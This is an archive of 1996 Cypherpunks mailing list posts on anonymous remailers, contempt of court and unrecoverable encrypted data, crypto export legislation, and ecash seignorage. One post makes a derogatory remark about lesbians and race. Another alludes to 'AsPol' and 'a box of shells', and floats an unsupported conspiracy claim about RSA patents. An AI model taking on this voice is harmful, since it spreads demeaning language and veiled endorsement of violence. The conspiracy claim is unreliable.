I have a feeling lots of people on the Cypherpunks list are going to be 
getting these... My first post to the list was only about two days ago, 
and someone's already messing around. :(

> Date: Sat, 6 Apr 96 16:42:14 +0300
> From: System Daemon <daemon@anon.penet.fi>
> To: steve@edmweb.com
> Subject: Anonymous code name allocated.
> 
> You have sent a message using the anon.penet.fi anonymous forwarding service.
> You have been allocated the code name an577024.
> You can be reached anonymously using the address
> an577024@anon.penet.fi.
> 
> If you want to use a nickname, please send a message to
> nick@anon.penet.fi, with a Subject: field containing your nickname.
> 
> For instructions, send a message to help@anon.penet.fi.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 7 Apr 1996 06:16:37 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Unicorn of Color
Message-ID: <ad8bf5e226021004c1b9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:00 PM 4/6/96, Black Unicorn wrote:
>On Fri, 5 Apr 1996, Timothy C. May wrote:

>>
>> Far be it from me to question the legal advice BU/Uni/Dirsec provides,
>
>Unicorn is fine, don't be snide.

Not meant to be snide, even if sounded that way. I just get confused by
your various nyms, as some call you "Uni," others call you by what I
presume is your real name (rhymes with Galois), and you sometimes sign your
messages "Dirsec."

Also, I am hesitant to call you "Black Unicorn," as applying the adjective
"black" to a person is illegal in some jurisdictions, and "Unicorn of
Color" does not ring true. (But I grew up calling blacks "colored people,"
and gladly switched to the more noble-sounding "black" in the 1960s, and
now I almost vomit everytime I hear some radfem lesbian claim "All wimmin
are people of color!!!!" Yeah, colored people. My, how the worm has
turned....)

Hope this clears things up.

--Tim


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 7 Apr 1996 06:37:24 +0800
To: cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <ad8bfa2028021004c0cf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:19 PM 4/6/96, Black Unicorn wrote:
>On Fri, 5 Apr 1996, Timothy C. May wrote:
>
>> If the secrets or assets _cannot_ be retrieved--a scenario which is
>> possible, if the protocol is so written (clauses for court action)--then
>> contempt charges are meaningless and would not stand, IMNALO.
>
>I'm not sure an appeals court will be particularly receptive to this
>argument.  I'll do a little research on the issue next week but I suspect
>that appeals courts will be reluctant to overturn contempt charges on
>this basis.  Firstly, appeals courts generally do not do their own
>findings of fact, but take the lower courts findings for granted.
>Secondly, in the absence of serious error, higher courts are unlikely to
>give their fellows a hard time.  The culture of the jurist as it
>were.

Well, I think this will be a matter of time and education. The courts have
not yet been presented with what we might call "unbreakable protocols" for
the holding of information. Existing secret holding "arrangements" (I'll
call them "arrangements" to make their informal, human-mediated nature more
clear) have typically involved secrets (information, money, etc.) held by
some other party subject to recall/retrieval by some form of instructions
from the owner/depositor.

The canonical example being a Swiss bank account, with the bank responding
when the proper numbers or signatures or whatever are presented. (Things
may have changed as the Swiss banks have become more compliant with U.S.
demands, but the example still stands.)

This model, is, I contend, the model with which courts are familiar. They
know that Alice can retrieve the funds, so they simply order her to. If she
does not comply, contempt of court. Q.E.D.

What of a different model? What if, say, her funds are in a "time lock
deposit," with the bank unwilling or even unable (cryptographic protocols
involving multiple key holders) to retrieve the funds until, say, 2010?
Even if she is being tortured to death and pleading with the
Gemeinschaftbank of Zurich to please, pretty please, release her funds,
they cannot.

It may take some convincing, and some education of the court (a la the
education that is slowly happening, as in the CDA case), but eventually it
will be realized that "contempt of court" is not applicable.

(The angle may be felonize the use of such "unbreakable" protocols, but
this is part of a larger story....)

>I might add that the Cayman Islands are full of trust companies with
>provisions which forbid the disclosure of data to a client who is
>coerced.  A law on the books refuses to recognize "consent" orders made
>under judicial compulsion.  This would give the appearance of total
>unavailability of evidence and suggest the futility of contempt
>charges.  Yet courts have still, and with no small measure of success,
>imposed sanctions on witnesses so protected.

I haven't studied such cases, but my hunch (SWAG) is that their are "leaks"
in such offshore deposits, that the courts have actually had some measure
of success in getting the funds that are reputed to be irretrievable.

In any case, if and when the jails fill up with up with people who _cannot_
comply with a court order, something will change.

(Note that I've never claimed such "unbreakable protocols" will become the
norm. Many of us, myself included, would rather have a way to pay off the
government to settle some tax evasion charge, or whatever, than sit in jail
for an unlimited time because we absolutely cannot retrieve the funds....)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sun, 7 Apr 1996 05:35:15 +0800
To: cypherpunks@toad.com
Subject: Re: Spinners and compression functions
Message-ID: <960406122835_370230637@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-06 11:26:26 EST, Perry Metzger sez:

>Actually, it doesn't. The entropy present from a reasonable source
>like keyclick timings is much much lower than the output of pkzip is
>going to suggest to you.

I am not saying that the output of the compression function has 8 bits of
entropy per byte, but rather that it will have a more consistent entropy
level per byte than the input to the function.  (Especially in the case of
idle loop timings, where the entropy fluctuates considerably, depending on
what the computer is doing.)  If you want to be conservative, you can assume
the output of the compression function has only 1 bit (or even less, if you
are really paranoid) of entropy per byte, and adjust your seeding
requirements accordingly.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 7 Apr 1996 07:01:03 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Contempt" charges likely to increase
In-Reply-To: <ad8b1bc71f02100483ae@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960406123254.2832B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Apr 1996, Timothy C. May wrote:

> At 9:26 PM 4/5/96, Bill Frantz wrote:
> >At 11:57 AM 4/5/96 -0800, Timothy C. May wrote:
> >
> >>If the secrets or assets _cannot_ be retrieved--a scenario which is
> >>possible, if the protocol is so written (clauses for court action)--then
> >>contempt charges are meaningless and would not stand, IMNALO.
> >
> >The Black Unicorn indicates that if the reason the secrets _cannot_ be
> >retrieved is because they are in a jurisdiction which refuses to reveal
> >them when the owner is under compulsion, the owner can still be punished
> >for contempt (A contractual situation).
> 
> Far be it from me to question the legal advice BU/Uni/Dirsec provides,

Unicorn is fine, don't be snide.

I don't provide legal "advice" on the list.

> but
> I think all contempt charges have a kind of eventual expiration. That is,
> after some number of months or years have passed and it becomes apparent
> the incarcerated person simply will not or cannot comply, release is
> ordered. It has happened in most cases of reporters, and it happened with
> Rebecca Morgan (who never did tell the court where her daughter was, though
> it later came out that her daughter was probably in Australia with
> grandparents).

If you mean, as I believe you do, that there is or can be a manner of 
"unofficial" expiration, I am in agreement with you.

> 
> Jail term for contempt of court has certain resemblances to trial by
> ordeal: if after some period of time of ordeal one has not talked, the
> ordeal is over.

This is about exactly correct.  While occassionally actual sentences are 
passed down, this is rare and contempt generally falls into the bucket of 
"until the witness becomes more cooperative."

> 
> If the court is shown that the protocol makes it impossible for the person
> to retrieve the material, especially that there are no ways to circumvent
> the contract, then the court may still jail the person for a while "just to
> make sure" that there is no means of circumventing it. If and when it
> becomes apparent to even the most skeptical that the material has been
> lost, or is unretrievable, then I think the contempt jailing must end. When
> nothing is served by furhter jailing, except punishment, then the reason
> for the contempt action is ended. Or so it seems to me, from what I've
> osmosed about the law.

The above is essentially correct.  The variable of the most consequence 
in such cases is the judge however.  One must convince the judge that no 
further incarceration will prove effective.  A witness' attorney could 
make showings to the court until he was blue in the face about the 
unavailability of the data because of cryptographic protocol.  He could 
even be right, but unless he convinces the judge, the witness is still 
going to be subject to the whims (yes, Mr. Bell, I do mean whims) of the 
judge.  Appealing contempt orders can be frustrating.  Most jurisdictions 
I've worked in use the "clear error" standard, which is difficult 
enough to beat in itself, and nearly impossible when the subject of the 
ruling before an appeals court is a fellow member of the bench.

To me this entire thread has threatened to suggest to people that they 
need only thumb their noses at the authorities, be it by cryptographic 
protocol or otherwise, and sit back in their easy chair and smile to 
themselves.  Practically speaking security is a self assured right in 
this regard.  Depending on anyone, be it your ISP, your attorney, or the 
constitution, is a foolish measure.  Mr. Parekh hit the nail on the 
head.  No ISP in its right mind is going to ask for trouble.  If I'm a 
prosecutor and I suspect that the ISP may be complicit in hiding 
evidence, I'm going to ask for a search and seizure warrant (a la sun 
devil) and just walk in and take the equipment I believe the data to be 
on and then satisify myself that it's unattainable.  In effect even some 
kind of insurance pool, or professional group of ISP's will have to 
provide for replacement of seized equipment to effectively prevent harm 
from government intervention.  This gets expensive real fast and as risk 
can only be assessed by the stated policy of the ISP with regard to 
resisting government, it will be the active resisters who find themselves 
with the whopping size premiums.

I understand that direct confrontation with government is appealing to 
the authority hater.  (I happen to be one).  Overt resistance, however, 
of the character suggested by Mr. Bell and others, is going to cause 
problems in two ways.  Firstly, its going to cause the individual 
resister a good deal of headaches.  Secondly, its going to make bad law 
eventually.

The solution is more about protocol than anything else.  

I'll be interested to see what courts come up with when it becomes clear 
that offshore and properly protected data is impossible to obtain with the 
current tools available to the judiciary.  I suspect that if enough big 
cases get stung by the crypto bee, someone is going to try and invent a 
bug lamp.  One need only follow the evoltion of law that followed strict 
banking secrecy in tax evasion to see where that might end up.
 
> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 7 Apr 1996 06:31:57 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u5QH8-00090aC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960406130107.2832C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Apr 1996, jim bell wrote:

> At 02:06 PM 4/5/96 -0500, Black Unicorn wrote:
> >On Fri, 5 Apr 1996 sameer@c2.org wrote:
> >
> >> 	What's the point here, or is Unicorn just having fun
> >> lambasting Jim Bell?
> >> 
> >> 	My basic attitude, running an internet privacy provider, is if
> >> Mr. Govt. wants my data, and gives me a court order (subpoena,
> >> "compelled discovery", whatever), then I'll give it to 'em.
> >> 	If my customers that they were looking for had any brains at
> >> all, a court order, compelled discover, whatever, will not help
> >> Mr. Govt. That's the cornerstone of my security model.
> >> 
> >> 	Or am I confused about what you are talking about here.
> >
> >Yours seems to be about the most aggressive policy a ISP provider can 
> >take and expect to remain in business.
> 
> This is a classic defeatist attitude, the one that Unicorn specializes in.  
> He wants us to believe that there is literally NOTHING that anyone can 
> possibly do to solve the "government problem."

No, it is a classic lawyer's attitude.  "If you do this, these are the 
risks."

> 
> I contend that had he talked to Phillip Zimmermann in 1990 or so, he would 
> have told Zimmermann that "It's illegal to write an encryption program using 
> RSA, because it's patented!  You'll never get away with it!"

I would have indicated that "you're going to face the prospect of 
intellectual property litigation, and that can get nasty in the extreme."

> But history records that Zimmermann _did_, and he "got away with it."

A combination of politics and law and timing.  If you're asking me to be 
a fortune teller, as so many people ask lawyers to do, you're asking too 
much.

> What I'm advocating is that people do what Zimmermann did: Write programs 
> that will extend the usages of encryption to thwart attempts to retrieve 
> data by its owners, whether or not the data is on the owner's system.

This in itself I have never had a problem with.  I have called for as 
much myself many times.

> >That is, resist by what legal means are available, but ultimately depend 
> >on the user to secure his or her own data.
> 
> Notice that Unicorn never gives useful specific suggestions about which 
> "legal means are available."

Notice that there are no checks in my mailbox from Mr. Bell.

> >Where I differ with Mr. Bell is that he seems to think the ISPs of the 
> >world are going to rise and unite to quash the oppressive hand of big 
> >government at their own expense in order to satisify some sense of 
> >personal ethics or customer goodwill.
> 
> Cumulatively, they could do exactly this.  Spread among most ISP's, the cost 
> per ISP could be quite low.

Provided you could get "most" ISP's to sign on, provided that the 
insurance provided for the very expensive proposition of seizure of ISP 
equipment, and provided that this be the first insurance entity ever with 
a stated policy of paying off policyholder for criminal sanctions which were 
directly the result of overt illegal acts by the policyholder.

I'm not saying it's impossible.  Well, I'm almost saying it's impossible.

> Augmented with my AsPol idea, the costs would 
> be even lower.  What was that quote?  "A box of shells is cheaper than an 
> appeal."

Yadda yadda yadda

> 
> Jim Bell
> jimbell@pacifier.com
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 7 Apr 1996 06:44:58 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Contempt" charges likely to increase
In-Reply-To: <ad8a9f931d0210045564@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960406130905.2832D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Apr 1996, Timothy C. May wrote:

> If the secrets or assets _cannot_ be retrieved--a scenario which is
> possible, if the protocol is so written (clauses for court action)--then
> contempt charges are meaningless and would not stand, IMNALO.

I'm not sure an appeals court will be particularly receptive to this 
argument.  I'll do a little research on the issue next week but I suspect 
that appeals courts will be reluctant to overturn contempt charges on 
this basis.  Firstly, appeals courts generally do not do their own 
findings of fact, but take the lower courts findings for granted.  
Secondly, in the absence of serious error, higher courts are unlikely to 
give their fellows a hard time.  The culture of the jurist as it 
were.

In the case where one appeals on the basis that the data cannot be retrieved 
because of cryptographic protections, an appeals court is unlikely to 
disturb the lower courts implicit finding that the data is recoverable.  
"Why would our esteemed member of the bench below impose such sanctions 
if he did not believe they might shake loose the very evidence he seeks?"

Not impossible that it would come out the other way, but I suspect it 
would have to be a really obvious error on the part of the court below.

I might add that the Cayman Islands are full of trust companies with 
provisions which forbid the disclosure of data to a client who is 
coerced.  A law on the books refuses to recognize "consent" orders made 
under judicial compulsion.  This would give the appearance of total 
unavailability of evidence and suggest the futility of contempt 
charges.  Yet courts have still, and with no small measure of success, 
imposed sanctions on witnesses so protected.

> 
> Legal students out there might find that specializing in this area of law
> brings in more clients in the coming decades.
> 
> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 7 Apr 1996 10:13:31 +0800
To: jim bell <cypherpunks@toad.com>
Subject: Re: ACM/IEEE Letter on Cryp
Message-ID: <199604062120.NAA12581@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:58 AM 4/6/96 -0800, jim bell wrote:
>[on the Burns bill]
>At 04:55 PM 4/3/96 -0500, Dave Banisar wrote:
>>The draft bill which currently exists only takes the export controls on
>>crpyto. The provisions on key escrow, criminal penalities and other problems
>>are not in there and Burns staff have no intention of letting them in. The
>>actual bill will be introduced in about 2 weeks.
>>-dave
>
>That sounds okay as far as it goes, but I can see a potential problem.  Your 
>wording above is unclear, but if the Burns bill totally eliminates export 
>controls that's great. However, we've frequently heard talk of "compromises" 
>like the Leahy bill which seem to relate exportable encryption to that which 
>is already available overseas.  There have been suspicions around there that 
>this is intended to keep the American producers out of the market as long as 
>possible, which is still a problem.  I don't think that's acceptable.

I have no objection to the salami approach in this case.  The way the Burns
proposal has been described, it seems all together better than the current
situation.  We can fight the next battle after people realize that the four
horseman are well and truly loose, and that the world hasn't ended.  When
the Burns proposal has been written up into a bill and introduced, I expect
I will be writing my congresscritters asking them to support it.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 7 Apr 1996 10:08:04 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Unicorn of Color
Message-ID: <199604062150.NAA15089@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 AM 4/6/96 -0800, Timothy C. May wrote:
>Also, I am hesitant to call you "Black Unicorn," as applying the adjective
>"black" to a person is illegal in some jurisdictions, and "Unicorn of
>Color" does not ring true. (But I grew up calling blacks "colored people,"
>and gladly switched to the more noble-sounding "black" in the 1960s, and
>now I almost vomit everytime I hear some radfem lesbian claim "All wimmin
>are people of color!!!!" Yeah, colored people. My, how the worm has
>turned....)

But Tim, we are ALL colored people.  Even the albinos among us (since white
is a mixture of all colors).  Even the darkest among us reflect some light
which has color.  :-)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 7 Apr 1996 09:45:44 +0800
To: Black Unicorn <tcmay@got.net>
Subject: Re: "Contempt" charges likely to increase
Message-ID: <199604062150.NAA15092@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:19 PM 4/6/96 -0500, Black Unicorn wrote:
>I might add that the Cayman Islands are full of trust companies with 
>provisions which forbid the disclosure of data to a client who is 
>coerced.  A law on the books refuses to recognize "consent" orders made 
>under judicial compulsion.  This would give the appearance of total 
>unavailability of evidence and suggest the futility of contempt 
>charges.  Yet courts have still, and with no small measure of success, 
>imposed sanctions on witnesses so protected.

It is one thing to believe that you might be able to change a human's mind
by threatening another human via jail.  (It reminds me of many bad movies.)
 It is quite a different level of hubris to think that a similar action
could overcome mathematical probability.  However, I am unable to predict
the actions of anyone who believes that the Supreme Court is the top
law-giver of the Universe.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 7 Apr 1996 11:01:32 +0800
To: cypherpunks@toad.com>
Subject: Re: ACM/IEEE Letter on Cryp
Message-ID: <m0u5ggW-0008xbC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 PM 4/6/96 -0800, Bill Frantz wrote:
>At  9:58 AM 4/6/96 -0800, jim bell wrote:
>>[on the Burns bill]

>>That sounds okay as far as it goes, but I can see a potential problem.  Your 
>>wording above is unclear, but if the Burns bill totally eliminates export 
>>controls that's great. However, we've frequently heard talk of "compromises" 
>>like the Leahy bill which seem to relate exportable encryption to that which 
>>is already available overseas.  There have been suspicions around there that 
>>this is intended to keep the American producers out of the market as long as 
>>possible, which is still a problem.  I don't think that's acceptable.
>
>I have no objection to the salami approach in this case.  The way the Burns
>proposal has been described, it seems all together better than the current
>situation.  We can fight the next battle after people realize that the four
>horseman are well and truly loose, and that the world hasn't ended.  When
>the Burns proposal has been written up into a bill and introduced, I expect
>I will be writing my congresscritters asking them to support it

Myself also, I suppose.  That's why I'm so concerned that it not contain any 
component that could be easily be re-written more to our liking.  The big 
attraction of the Burns bill, from a strategic standpoint, is that (by the 
elimination of export controls, assuming it does it) it removes the one 
major "must do" task onto which could be loaded other "features" that we 
can't stand, as the Leahy bill tried to do.  Once export controls are 
eliminated on crypto, it should become impossible to get enough support to 
pass a bill even mentioning key escrow, let alone mandating it. 

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 7 Apr 1996 11:54:55 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u5gs0-0008zfC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:07 PM 4/6/96 -0500, Black Unicorn wrote:

>> I contend that had he talked to Phillip Zimmermann in 1990 or so, he would 
>> have told Zimmermann that "It's illegal to write an encryption program 
using 
>> RSA, because it's patented!  You'll never get away with it!"
>
>I would have indicated that "you're going to face the prospect of 
>intellectual property litigation, and that can get nasty in the extreme."

One thing I've never heard is an explanation of how computer software and 
especially mathematics went from "extremely not patentable" in the early and 
middle 1970's, to "patentable" once Messr's Rivest, Shamir, and Adleman 
invented a piece of mathematics that the government wanted to deny to the 
public.  How convenient.

Coincidence?

Even if we accept the supposition that at some point, "they" decided for 
non-suspicious reasons to _start_ issuing patents on software and 
mathematics, I've never heard an explanation of how R, S, and A _knew_ to 
apply for a patent, long before the first software patent was issued, and 
even longer before the first pure mathematics patent was issued.  (which, 
was, probably, on RSA!)

Were these guys psychic or what?  Who told them what, and when?  Patents 
have to be applied-for within a year of disclosure, which means they had to 
decide whether to pay the money for a patent application that by historic 
standards could not possibly be issued.  Yet they did it anyway.

What's wrong with this picture?

>> But history records that Zimmermann _did_, and he "got away with it."
>
>A combination of politics and law and timing.

Something tells me that given the unblemished history of non-patentable 
mathematics, RSA could never have withstood a patent challenge.  They had to 
have known this.


>> >That is, resist by what legal means are available, but ultimately depend 
>> >on the user to secure his or her own data.
>> 
>> Notice that Unicorn never gives useful specific suggestions about which 
>> "legal means are available."
>
>Notice that there are no checks in my mailbox from Mr. Bell.

Implying that he's unwilling to do anything useful for free, which raises 
interesting questions about why he's bothering to  send his notes to me.  Is 
he being _paid_ for this?

>> >Where I differ with Mr. Bell is that he seems to think the ISPs of the 
>> >world are going to rise and unite to quash the oppressive hand of big 
>> >government at their own expense in order to satisify some sense of 
>> >personal ethics or customer goodwill.
>> 
>> Cumulatively, they could do exactly this.  Spread among most ISP's, the 
cost 
>> per ISP could be quite low.
>
>Provided you could get "most" ISP's to sign on, provided that the 
>insurance provided for the very expensive proposition of seizure of ISP 
>equipment, and provided that this be the first insurance entity ever with 
>a stated policy of paying off policyholder for criminal sanctions which were 
>directly the result of overt illegal acts by the policyholder.

Yet another misrepresentation.  The purpose of the risk-pooling is obviously 
to set a friendly precedent, and it does not require any "overt illegal 
acts," merely challenges to an overly broad interpretation of subpoena 
power.  Any siezure of ISP equipment would simply result in another "Steve 
Jackson Games"-type decision that would be expensive for the jurisdiction in 
which it occurred, and would further cement the precedent that the 
government couldn't do anything about.

In fact, one of the most obvious precedents that needs to be set is that the 
government has no right to sieze equipment from an ISP (and thus shut the 
ISP down) if all it wants is _data_.  Clearly, that's exceeding the bounds 
of what the government is realistically entitled to.  I think the most any 
ISP should be required to do is to present an encrypted version of all the 
system's data, and then the appeals process can start.  The government won't 
be able to use the data until the process is complete, months or years down 
the line.  Naturally, the fact that the information on the system is 
subpoenaed should automatically become public knowledge, because the data is 
already fixed and immutable.

And an ISP should NEVER be required to act as an agent for the cops, and in 
fact should be prohibited from doing so if his contracts with his customers 
certify he won't be.  

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 7 Apr 1996 09:35:23 +0800
To: cypherpunks@toad.com
Subject: Seignorage
Message-ID: <ad8c243729021004a47a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(I'm cc:ing quibblepunks@toad.com and dictionarypunks@toad.com because of
their obvious and inordinate interest, so to speak, in such matters.)

>From the "MIT Dictionary of Modern Economics," 4th Edition, 1992:

"seignorage. Historically, and as applied to money, this was a levy on
metals brought to the mint for coining, to recover the cost of minting and
provide a revenue to the ruler who claimed it as a prerogative. In recent
monetary literature the term has been revived and applied to the net
revenue derived by any money-issuing body, e.g. a note-issuing authority.
It is applied more especially to a country whose currency is held by
foreigners for trading or reserve purposes. In this case the seignorage
amounts to the return on the extra assets, real or financial, which the
country is enabled to acquire because of the external holdings of its
currency, less the interest paid on the assets in which the foreigners
invest their holdings, and less any extra administrative costs arising from
the international role of its money."

So it would seem that seignorage certainly can be used as a term for the
interest the note-issuer for digital cash or any similar
non-interest-bearing notes (banknotes, traveller's checks, e-cash in many
forms, etc.). And the connection with the "float" is clear.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sun, 7 Apr 1996 12:40:25 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: Someone's screwing around with anon.penet.fi
Message-ID: <199604062359.PAA23221@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 AM 4/6/96 -0800, Steve Reid <steve@edmweb.com> wrote:
>Here's another one of them unsolicited messages from anon.penet.fi.
>I have a feeling lots of people on the Cypherpunks list are going to be 
>getting these... My first post to the list was only about two days ago, 
>and someone's already messing around. :(

Anon.penet.fi is working just fine.  The problem is that someone
subscribed to the cypherpunks list as anXXXXXX@anon.penet.fi, so
any time you post to cypherpunks, anon.penet.fi receives a message
        From: you@yourplace.com
        To: anXXXXXX@anon.penet.fi
        Subject: My exciting post to cypherpunks
It then checks its userlist for you@yourplace.fi, doesn't find you,
allocates anYYYYYY@anon.penet.fi, notifies you, and sends out the message
        From: anYYYYYY@anon.penet.fi
        To: hisname@hisplace.com
        Subject: My exciting post to cypherpunks

In my case, if I post to cypherpunks, it checks its userlist for
stewarts@ix.netcom.com, finds anZZZZZZ@anon.penet.fi, sees that my
password is PASSWORD, sees that the posting doesn't include the password,
and sends me a reject message.  

The problem is that, the next time you post to cypherpunks, it'll leak
your identity in the message headers; I forget the details.

The way to prevent this whole mess is to educate majordomo to turn
subscription requests from anXXXXXX@anon.penet.fi into naXXXXXX@anon.penet.fi,
or at least to block subscription requests form anXXXXXX@anon.penet.fi.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 7 Apr 1996 12:40:51 +0800
To: Gary Howland <gary@kampai.euronet.nl>
Subject: Re: e$ seigniorage (and is this the cost of untracability?)
In-Reply-To: <199604061906.VAA16731@kampai.euronet.nl>
Message-ID: <Pine.SUN.3.92.960406154934.27655B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 6 Apr 1996, Gary Howland wrote:

>     - What will be the typical time between the withdrawal of ecash
> 	  and it being deposited?

I think this will depend on how easy it is to withdraw ecash.  If the
client software includes an option of automaticly withdrawing ecash from
the bank when you don't have enough ecash to pay for the current purchase
(thereby reducing the time between withdrawal and deposit to zero), then I
suspect most people will use it, even though (anticipating your next
question) this compromises their untraceability.

>     - Does the untraceability of ecash (of all types) rely on a time delay
>       between withdrawal and deposit (I guess it does), and if so, is the
>       interest that the consumer inevitably loses (and the ecash issuer gains)
>       the price the consumer must pay for untracability of transactions?

The untraceability of ecash does depend on a time delay between withdrawal
and deposit.  It's analogous to the fact that the untraceability of
anonymous e-mail depend on a time delay between sending and receiving.  I
think you're probably right that the interest lost is a price the consumer
must pay for untraceability.

One possible way to get around this is to have ecash issuers pay interest
on ecash.  However it requires ecash to be timestamped and therefore
compromises its untraceability.  (Think of the timestamp as a serial
number.)

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rngaugp@alpha.c2.org
